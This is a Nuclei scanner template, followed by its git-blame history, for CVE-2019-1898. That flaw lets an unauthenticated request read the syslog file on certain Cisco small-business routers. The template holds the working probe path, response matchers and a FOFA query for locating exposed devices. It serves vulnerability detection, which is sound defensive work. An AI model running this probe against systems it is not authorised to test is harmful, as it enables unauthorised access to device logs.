nuclei-templates/http/cves/2019/CVE-2019-1898.yaml

id: CVE-2019-1898

info:
  name: Cisco RV110W RV130W RV215W Router - Information leakage
  author: SleepingBag945
  severity: medium
  description: |
    A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information from the router.
  remediation: |
    Apply the latest firmware update provided by Cisco to fix the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-1898
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-fileaccess
    - https://www.tenable.com/security/research/tra-2019-29
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-1898
    cwe-id: CWE-425,CWE-285
    epss-score: 0.07254
    epss-percentile: 0.93384
    cpe: cpe:2.3:o:cisco:rv110w_firmware:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cisco
    product: rv110w_firmware
    fofa-query: icon_hash="-646322113"
  tags: cve,cve2019,cisco,router,iot

http:
  - method: POST
    path:
      - '{{BaseURL}}/_syslog.txt'

    headers:
      Content-Type: application/x-www-form-urlencoded
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(to_lower(body), "ethernet") && contains(to_lower(body), "connection")'
          - 'contains(header, "application/octet-stream")'
        condition: and
# digest: 4a0a00473045022067f8931eeb97e0fbffc1398a800aa506accd3b190b654c90cf98eccafda48444022100d3f77b11e58945d5ba55c13e661a4a09440e9213c8b66cb3c5aca2899f208872:922c64590222798bb761d5b6d8e72950
Create CVE-2019-1898.yaml 2023-08-21 15:48:36 +00:00			`id: CVE-2019-1898`

			`info:`
			`name: Cisco RV110W RV130W RV215W Router - Information leakage`
			`author: SleepingBag945`
			`severity: medium`
			`description: \|`
			`A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`An attacker can exploit this vulnerability to gain sensitive information from the router.`
updated 2019 CVEs 2023-09-06 12:53:28 +00:00			`remediation: \|`
			`Apply the latest firmware update provided by Cisco to fix the vulnerability.`
Create CVE-2019-1898.yaml 2023-08-21 15:48:36 +00:00			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2019-1898`
			`- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-fileaccess`
			`- https://www.tenable.com/security/research/tra-2019-29`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N`
			`cvss-score: 5.3`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`cve-id: CVE-2019-1898`
Create CVE-2019-1898.yaml 2023-08-21 15:48:36 +00:00			`cwe-id: CWE-425,CWE-285`
templateman update 2023-10-14 11:27:55 +00:00			`epss-score: 0.07254`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`epss-percentile: 0.93384`
updated 2019 CVEs 2023-09-06 12:53:28 +00:00			`cpe: cpe:2.3:o:cisco:rv110w_firmware:-:::::::*`
Create CVE-2019-1898.yaml 2023-08-21 15:48:36 +00:00			`metadata:`
			`verified: true`
			`max-request: 1`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`vendor: cisco`
			`product: rv110w_firmware`
updated 2019 CVEs 2023-09-06 12:53:28 +00:00			`fofa-query: icon_hash="-646322113"`
Create CVE-2019-1898.yaml 2023-08-21 15:48:36 +00:00			`tags: cve,cve2019,cisco,router,iot`

			`http:`
			`- method: POST`
			`path:`
			`- '{{BaseURL}}/_syslog.txt'`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00
Create CVE-2019-1898.yaml 2023-08-21 15:48:36 +00:00			`headers:`
			`Content-Type: application/x-www-form-urlencoded`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'status_code == 200'`
			`- 'contains(to_lower(body), "ethernet") && contains(to_lower(body), "connection")'`
			`- 'contains(header, "application/octet-stream")'`
			`condition: and`
Auto Template Signing [Sun Jan 14 14:05:19 UTC 2024] :robot: 2024-01-14 14:05:19 +00:00			`# digest: 4a0a00473045022067f8931eeb97e0fbffc1398a800aa506accd3b190b654c90cf98eccafda48444022100d3f77b11e58945d5ba55c13e661a4a09440e9213c8b66cb3c5aca2899f208872:922c64590222798bb761d5b6d8e72950`